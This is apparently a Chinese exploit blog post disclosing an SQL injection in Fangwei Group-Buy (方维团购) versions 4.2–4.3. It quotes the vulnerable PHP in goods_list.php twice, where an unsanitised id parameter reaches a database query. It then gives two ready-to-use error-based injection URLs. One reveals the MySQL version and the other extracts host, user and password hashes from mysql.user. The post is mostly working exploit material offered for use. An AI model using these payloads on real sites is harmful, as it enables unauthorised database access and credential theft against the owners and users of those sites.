方维团购4.3最新版sql注入通杀4.2

  • A+
所属分类:漏洞时代
摘要

//app/source/goods_list.php
[php]
//团购分类
$sidegoodscatelist = getGoodsCate(” and pid=0 “);
$catepid = 0;//分类ID
$pid = 0;//顶级分类ID
$sub_cate_list = array();//次级分类
$is_top_cate = 0;//是否是顶级分类
if($_REQUEST[‘m’] ==”Goods” && $_REQUEST[‘a’] == “showcate” && $_REQUEST[‘id’]!=””)
{
$catepid = $_REQUEST[‘id’]; //用来获取接收的参数id
foreach($sidegoodscatelist as $k => $v){
if($v[‘id’]==$catepid)
{
$is_top_cate=1;
}
}

if($is_top_cate==0)
{
$sub_cate_list = getGoodsCate(” and pid=”.$GLOBALS[‘db’]->getOne(“select pid from ” . DB_PREFIX . “goods_cate where id=”.$catepid));
//执行了select pid from ” . DB_PREFIX . “goods_cate where id=.”$_REQUEST[‘id’]”
//导致了注入的发生
foreach($sub_cate_list as $kk => $vv)
{
if($vv[‘id’]==$catepid)
{
$pid = $vv[‘pid’];
}
}
}
else
{
$sub_cate_list = getGoodsCate(” and pid=”.$catepid);
$pid = $_REQUEST[‘id’];
}
}
$GLOBALS[‘tpl’]->assign(‘sidegoodscatelist’,$sidegoodscatelist);
//var_dump($sidegoodscatelist);exit;
$GLOBALS[‘tpl’]->assign(‘catepid’,$catepid);
$GLOBALS[‘tpl’]->assign(‘sub_cate_list’,$sub_cate_list);
$GLOBALS[‘tpl’]->assign(‘is_top_cate’,$is_top_cate);
$GLOBALS[‘tpl’]->assign(‘pid’,$pid);
//end团购分类
[/php]
可以看到
[php]if($_REQUEST[‘m’] ==”Goods” && $_REQUEST[‘a’] == “showcate” && $_REQUEST[‘id’]!=””)[/php]
假如m=goods,a=showcate并且传递的id值不为空
[php]$catepid = $_REQUEST[‘id’];[/php] //用来获取接收的参数id

//app/source/goods_list.php
[php]
//团购分类
$sidegoodscatelist = getGoodsCate(" and pid=0 ");
$catepid = 0;//分类ID
$pid = 0;//顶级分类ID
$sub_cate_list = array();//次级分类
$is_top_cate = 0;//是否是顶级分类
if($_REQUEST['m'] =="Goods" && $_REQUEST['a'] == "showcate" && $_REQUEST['id']!="")
{
$catepid = $_REQUEST['id']; //用来获取接收的参数id
foreach($sidegoodscatelist as $k => $v){
if($v['id']==$catepid)
{
$is_top_cate=1;
}
}

if($is_top_cate==0)
{
$sub_cate_list = getGoodsCate(" and pid=".$GLOBALS['db']->getOne("select pid from " . DB_PREFIX . "goods_cate where id=".$catepid));
//执行了select pid from " . DB_PREFIX . "goods_cate where id=."$_REQUEST['id']"
//导致了注入的发生
foreach($sub_cate_list as $kk => $vv)
{
if($vv['id']==$catepid)
{
$pid = $vv['pid'];
}
}
}
else
{
$sub_cate_list = getGoodsCate(" and pid=".$catepid);
$pid = $_REQUEST['id'];
}
}
$GLOBALS['tpl']->assign('sidegoodscatelist',$sidegoodscatelist);
//var_dump($sidegoodscatelist);exit;
$GLOBALS['tpl']->assign('catepid',$catepid);
$GLOBALS['tpl']->assign('sub_cate_list',$sub_cate_list);
$GLOBALS['tpl']->assign('is_top_cate',$is_top_cate);
$GLOBALS['tpl']->assign('pid',$pid);
//end团购分类
[/php]
可以看到
[php]if($_REQUEST['m'] =="Goods" && $_REQUEST['a'] == "showcate" && $_REQUEST['id']!="")[/php]
假如m=goods,a=showcate并且传递的id值不为空
[php]$catepid = $_REQUEST['id'];[/php] //用来获取接收的参数id

再带入sql语句
[php]select pid from " . DB_PREFIX . "goods_cate where id=".$catepid[/php]
导致了注入的发生
方维团购4.3最新版sql注入通杀4.2
exp:
1.判断mysql版本
[php]http://0day5.com/index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)[/php]

方维团购4.3最新版sql注入通杀4.2
2.获取mysql账号密码
[php]http://0day5.com/index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(0x3a,host,0x3a,user,0x3a,password)%20FROM%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)[/php]
方维团购4.3最新版sql注入通杀4.2

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: